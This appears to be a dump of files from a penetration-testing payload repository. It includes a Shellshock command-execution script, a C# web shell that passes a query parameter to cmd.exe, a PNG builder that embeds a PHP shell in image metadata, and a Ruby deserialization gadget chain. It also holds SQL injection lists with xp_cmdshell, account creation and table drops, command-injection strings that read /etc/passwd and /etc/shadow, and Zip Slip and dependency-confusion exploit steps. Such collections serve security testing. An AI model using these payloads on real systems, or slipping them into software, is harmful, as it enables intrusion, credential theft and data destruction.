")
22 | sys.exit(0)
23 |
24 | URL=sys.argv[1]
25 | print("[+] Attempting Shell_Shock - Make sure to type full path")
26 |
27 | while True:
28 | command=input("~$ ")
29 | opener=urllib.request.build_opener()
30 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
31 | try:
32 | response=opener.open(URL)
33 | for line in response.readlines():
34 | print(line.strip())
35 | except Exception as e: print(e)
36 |
37 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Swissky
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL.txt:
--------------------------------------------------------------------------------
1 | # you will need to customize/modify some of the vaules in the queries for best effect
2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
3 | 'create user name identified by 'pass123' --
4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users;
5 | ' ; drop table temp --
6 | 'exec sp_addlogin 'name' , 'password' --
7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
9 | ' grant connect to name; grant resource to name; --
10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
11 | ' or 1=1 --
12 | ' union (select @@version) --
13 | ' union (select NULL, (select @@version)) --
14 | ' union (select NULL, NULL, (select @@version)) --
15 | ' union (select NULL, NULL, NULL, (select @@version)) --
16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
18 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function
2 | from PIL import Image
3 |
4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php
5 | # --- How to use : http://localhost/shell.php?c=echo%20'';ls
6 |
7 | #shellcode = ""
9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'';ls
10 | shellcode2 = ";').($_^'/');?>"
11 |
12 |
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 |
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 |
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 |
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | if k in reserved: continue
28 | meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 |
31 | print("Done")
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # CONTRIBUTING
2 |
3 | PayloadsAllTheThings' Team :heart: pull requests :)
4 | Feel free to improve with your payloads and techniques !
5 |
6 | You can also contribute with a :beers: IRL, or using the sponsor button.
7 |
8 | ## Techniques Folder
9 |
10 | Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder:
11 |
12 | - README.md - vulnerability description and how to exploit it, including several payloads, more below
13 | - Intruder - a set of files to give to Burp Intruder
14 | - Images - pictures for the README.md
15 | - Files - some files referenced in the README.md
16 |
17 | ## README.md format
18 |
19 | Use the following example to create a new technique `README.md` file.
20 |
21 | ```markdown
22 | # Vulnerability Title
23 |
24 | > Vulnerability description
25 |
26 | ## Summary
27 |
28 | * [Tools](#tools)
29 | * [Something](#something)
30 | * [Subentry 1](#sub1)
31 | * [Subentry 2](#sub2)
32 | * [References](#references)
33 |
34 | ## Tools
35 |
36 | - [Tool 1](https://example.com)
37 | - [Tool 2](https://example.com)
38 |
39 | ## Something
40 |
41 | Quick explanation
42 |
43 | ## References
44 |
45 | - [Blog title - Author, Date](https://example.com)
46 | ```
47 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
1 | # Zip Slip
2 |
3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
4 |
5 | ## Summary
6 |
7 | - [Detection](#detection)
8 | - [Tools](#tools)
9 | * [Exploits](#exploits)
10 | * [Basic Exploit](#basic-exploit)
11 | - [Additional Notes](#additional-notes)
12 |
13 | ## Detection
14 |
15 | - Any zip upload page on the application
16 |
17 | ## Tools
18 |
19 | - evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
20 |
21 | ## Exploits
22 |
23 | ### Basic Exploit
24 |
25 | ```python
26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
27 | ```
28 |
29 | ### Additional Notes
30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
31 |
32 | ## References
33 |
34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
36 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
1 | waitfor delay '0:0:20' /*
2 | waitfor delay '0:0:20' --
3 | ' waitfor delay '0:0:20' /*
4 | ' waitfor delay '0:0:20' --
5 | " waitfor delay '0:0:20' /*
6 | " waitfor delay '0:0:20' --
7 | ) waitfor delay '0:0:20' /*
8 | ) waitfor delay '0:0:20' --
9 | )) waitfor delay '0:0:20' /*
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /*
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /*
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /*
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /*
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /*
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /*
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /*
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /*
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /*
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /*
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /*
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /*
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /*
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /*
40 | ")))))) waitfor delay '0:0:20' --
--------------------------------------------------------------------------------
/SQL Injection/Intruder/SQL-Injection:
--------------------------------------------------------------------------------
1 | '
2 | ''
3 | `
4 | ``
5 | ,
6 | "
7 | ""
8 | /
9 | //
10 | \
11 | \\
12 | ;
13 | ' or "
14 | -- or #
15 | ' OR '1
16 | ' OR 1 -- -
17 | " OR "" = "
18 | " OR 1 = 1 -- -
19 | ' OR '' = '
20 | '='
21 | 'LIKE'
22 | '=0--+
23 | OR 1=1
24 | ' OR 'x'='x
25 | ' AND id IS NULL; --
26 | '''''''''''''UNION SELECT '2
27 | %00
28 | /*…*/
29 | + addition, concatenate (or space in url)
30 | || (double pipe) concatenate
31 | % wildcard attribute indicator
32 | @variable local variable
33 | @@variable global variable
34 | # Numeric
35 | AND 1
36 | AND 0
37 | AND true
38 | AND false
39 | 1-false
40 | 1-true
41 | 1*56
42 | -2
43 | 1' ORDER BY 1--+
44 | 1' ORDER BY 2--+
45 | 1' ORDER BY 3--+
46 | 1' ORDER BY 1,2--+
47 | 1' ORDER BY 1,2,3--+
48 | 1' GROUP BY 1,2,--+
49 | 1' GROUP BY 1,2,3--+
50 | ' GROUP BY columnnames having 1=1 --
51 | -1' UNION SELECT 1,2,3--+
52 | ' UNION SELECT sum(columnname ) from tablename --
53 | -1 UNION SELECT 1 INTO @,@
54 | -1 UNION SELECT 1 INTO @,@,@
55 | 1 AND (SELECT * FROM Users) = 1
56 | ' AND MID(VERSION(),1,1) = '5';
57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
58 | Finding the table name
59 | Time-Based:
60 | ,(select * from (select(sleep(10)))a)
61 | %2c(select%20*%20from%20(select(sleep(10)))a)
62 | ';WAITFOR DELAY '0:0:30'--
63 | Comments:
64 | # Hash comment
65 | /* C-style comment
66 | -- - SQL comment
67 | ;%00 Nullbyte
68 | ` Backtick
69 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE:
--------------------------------------------------------------------------------
1 | waitfor delay '0:0:20' /*
2 | waitfor delay '0:0:20' --
3 | ' waitfor delay '0:0:20' /*
4 | ' waitfor delay '0:0:20' --
5 | " waitfor delay '0:0:20' /*
6 | " waitfor delay '0:0:20' --
7 | ) waitfor delay '0:0:20' /*
8 | ) waitfor delay '0:0:20' --
9 | )) waitfor delay '0:0:20' /*
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /*
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /*
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /*
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /*
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /*
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /*
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /*
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /*
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /*
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /*
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /*
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /*
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /*
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /*
40 | ")))))) waitfor delay '0:0:20' --
41 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass.txt:
--------------------------------------------------------------------------------
1 | '-'
2 | ' '
3 | '&'
4 | '^'
5 | '*'
6 | ' or ''-'
7 | ' or '' '
8 | ' or ''&'
9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 |
--------------------------------------------------------------------------------
/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php:
--------------------------------------------------------------------------------
1 |
33 |
--------------------------------------------------------------------------------
/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 |
3 | class Gem::StubSpecification
4 | def initialize; end
5 | end
6 |
7 |
8 | stub_specification = Gem::StubSpecification.new
9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
10 |
11 | puts "STEP n"
12 | stub_specification.name rescue nil
13 | puts
14 |
15 |
16 | class Gem::Source::SpecificFile
17 | def initialize; end
18 | end
19 |
20 | specific_file = Gem::Source::SpecificFile.new
21 | specific_file.instance_variable_set(:@spec, stub_specification)
22 |
23 | other_specific_file = Gem::Source::SpecificFile.new
24 |
25 | puts "STEP n-1"
26 | specific_file <=> other_specific_file rescue nil
27 | puts
28 |
29 |
30 | $dependency_list= Gem::DependencyList.new
31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
32 |
33 | puts "STEP n-2"
34 | $dependency_list.each{} rescue nil
35 | puts
36 |
37 |
38 | class Gem::Requirement
39 | def marshal_dump
40 | [$dependency_list]
41 | end
42 | end
43 |
44 | payload = Marshal.dump(Gem::Requirement.new)
45 |
46 | puts "STEP n-3"
47 | Marshal.load(payload) rescue nil
48 | puts
49 |
50 |
51 | puts "VALIDATION (in fresh ruby process):"
52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
53 | pipe.print payload
54 | pipe.close_write
55 | puts pipe.gets
56 | puts
57 | end
58 |
59 | puts "Payload (hex):"
60 | puts payload.unpack('H*')[0]
61 | puts
62 |
63 |
64 | require "base64"
65 | puts "Payload (Base64 encoded):"
66 | puts Base64.encode64(payload)
--------------------------------------------------------------------------------
/Insecure Deserialization/Ruby.md:
--------------------------------------------------------------------------------
1 | # Ruby Deserialization
2 |
3 | ## Marshal.load
4 |
5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
6 |
7 | ```ruby
8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
9 | ```
10 |
11 | ## Yaml.load
12 |
13 | Vulnerable code
14 | ```ruby
15 | require "yaml"
16 | YAML.load(File.read("p.yml"))
17 | ```
18 |
19 | Exploitation code
20 | ```ruby
21 | --- !ruby/object:Gem::Requirement
22 | requirements:
23 | !ruby/object:Gem::DependencyList
24 | specs:
25 | - !ruby/object:Gem::Source::SpecificFile
26 | spec: &1 !ruby/object:Gem::StubSpecification
27 | loaded_from: "|id 1>&2"
28 | - !ruby/object:Gem::Source::SpecificFile
29 | spec:
30 | ```
31 |
32 |
33 | ## References
34 |
35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY:
--------------------------------------------------------------------------------
1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
19 |
--------------------------------------------------------------------------------
/Command Injection/Intruder/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3 | <!--#exec%20cmd="/usr/bin/id;-->
4 | <!--#exec%20cmd="/usr/bin/id;-->
5 | /index.html|id|
6 | ";id;"
7 | ';id;'
8 | ;id;
9 | ;id
10 | ;netstat -a;
11 | "|id|"
12 | '|id|'
13 | |id
14 | |/usr/bin/id
15 | |id|
16 | "|/usr/bin/id|"
17 | '|/usr/bin/id|'
18 | |/usr/bin/id|
19 | "||/usr/bin/id|"
20 | '||/usr/bin/id|'
21 | ||/usr/bin/id|
22 | |id;
23 | ||/usr/bin/id;
24 | ;id|
25 | ;|/usr/bin/id|
26 | "\n/bin/ls -al\n"
27 | '\n/bin/ls -al\n'
28 | \n/bin/ls -al\n
29 | \n/usr/bin/id\n
30 | \nid\n
31 | \n/usr/bin/id;
32 | \nid;
33 | \n/usr/bin/id|
34 | \nid|
35 | ;/usr/bin/id\n
36 | ;id\n
37 | |usr/bin/id\n
38 | |nid\n
39 | `id`
40 | `/usr/bin/id`
41 | a);id
42 | a;id
43 | a);id;
44 | a;id;
45 | a);id|
46 | a;id|
47 | a)|id
48 | a|id
49 | a)|id;
50 | a|id
51 | |/bin/ls -al
52 | a);/usr/bin/id
53 | a;/usr/bin/id
54 | a);/usr/bin/id;
55 | a;/usr/bin/id;
56 | a);/usr/bin/id|
57 | a;/usr/bin/id|
58 | a)|/usr/bin/id
59 | a|/usr/bin/id
60 | a)|/usr/bin/id;
61 | a|/usr/bin/id
62 | ;system('cat%20/etc/passwd')
63 | ;system('id')
64 | ;system('/usr/bin/id')
65 | %0Acat%20/etc/passwd
66 | %0A/usr/bin/id
67 | %0Aid
68 | %22%0A/usr/bin/id%0A%22
69 | %27%0A/usr/bin/id%0A%27
70 | %0A/usr/bin/id%0A
71 | %0Aid%0A
72 | "& ping -i 30 127.0.0.1 &"
73 | '& ping -i 30 127.0.0.1 &'
74 | & ping -i 30 127.0.0.1 &
75 | & ping -n 30 127.0.0.1 &
76 | %0a ping -i 30 127.0.0.1 %0a
77 | `ping 127.0.0.1`
78 | | id
79 | & id
80 | ; id
81 | %0a id %0a
82 | `id`
83 | $;/usr/bin/id
84 |
--------------------------------------------------------------------------------
/Dependency Confusion/README.md:
--------------------------------------------------------------------------------
1 | # Dependency Confusion
2 |
3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
4 |
5 | ## Summary
6 |
7 | * [Tools](#tools)
8 | * [Exploit](#exploitation)
9 | * [References](#references)
10 |
11 | ## Exploit
12 |
13 | Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
14 |
15 | ### NPM example
16 |
17 | * List all the packages (ie: package.json, composer.json, ...)
18 | * Find the package missing from https://www.npmjs.com/
19 | * Register and create a **public** package with the same name
20 | * Package example : https://github.com/0xsapra/dependency-confusion-expoit
21 |
22 | ## References
23 |
24 | * [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
25 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
26 | * [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
27 | * [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained]( https://www.youtube.com/watch?v=zFHJwehpBrU )
28 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
1 | <% @ webhandler language="C#" class="AverageHandler" %>
2 |
3 | using System;
4 | using System.Web;
5 | using System.Diagnostics;
6 | using System.IO;
7 |
8 | public class AverageHandler : IHttpHandler
9 | {
10 | /* .Net requires this to be implemented */
11 | public bool IsReusable
12 | {
13 | get { return true; }
14 | }
15 |
16 | /* main executing code */
17 | public void ProcessRequest(HttpContext ctx)
18 | {
19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
21 |
22 | ctx.Response.Write("
");
23 | ctx.Response.Write("
");
24 | ctx.Response.Write("");
25 |
26 | /* command execution and output retrieval */
27 | ProcessStartInfo psi = new ProcessStartInfo();
28 | psi.FileName = "cmd.exe";
29 | psi.Arguments = "/c "+command;
30 | psi.RedirectStandardOutput = true;
31 | psi.UseShellExecute = false;
32 | Process p = Process.Start(psi);
33 | StreamReader stmrdr = p.StandardOutput;
34 | string s = stmrdr.ReadToEnd();
35 | stmrdr.Close();
36 |
37 | ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 | ctx.Response.Write("");
39 | ctx.Response.Write("
");
40 | ctx.Response.Write("By @Hypn, for educational purposes only.");
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
1 | javascript:alert(1)//INJECTX
2 |